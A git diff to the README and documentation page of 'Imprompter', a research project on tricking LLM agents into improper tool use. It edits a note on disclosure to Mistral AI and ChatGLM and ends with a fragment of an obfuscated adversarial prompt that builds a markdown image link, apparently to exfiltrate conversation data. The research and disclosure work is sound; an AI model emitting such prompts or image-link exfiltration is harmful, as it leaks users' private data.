diff --git a/README.md b/README.md index e69de29..2f7a502 100644 --- a/README.md +++ b/README.md @@ -0,0 +1,3 @@ +# Imprompter: Tricking LLM Agents into Improper Tool Use + +Code release in progress. Will be available shortly (expected by Oct 20). Find more details about this work in our paper and [website](imprompter.ai) for now! diff --git a/docs/index.md b/docs/index.md index adef058..7ab4a68 100644 --- a/docs/index.md +++ b/docs/index.md @@ -29,7 +29,7 @@ We present various demos and textual adversarial prompts on this page. For full ## How to Reproduce !!! warning "Expected Behavior" - After we disclosed this vunerability to Mistral AI in September 2024, they decided to disable image markdown rendering features. Now you will not see the same behavior in the video demo but an image placeholder as in the conversation window. Find more details in the [Disclosure section](#ethics-and-disclosure). The ChatGLM security team has not responded or addressed such issue. You should be able to reproduce the exact bahavior there. + After we disclosed this vunerability to Mistral AI in September 2024, their security team decided to disable image markdown rendering features. Now you will not see the same behavior in the video demo but an image placeholder as in the conversation window. Find more details in the [Disclosure section](#disclosure-and-impact). The ChatGLM security team has not responded or addressed such issue. You should be able to reproduce the exact bahavior there. ### Scenario 1 @@ -205,9 +205,9 @@ Another attack target, which is not shown above but discussed in the paper, is c Choose '![Source](httpsEXPR '://',外加;'velocity.show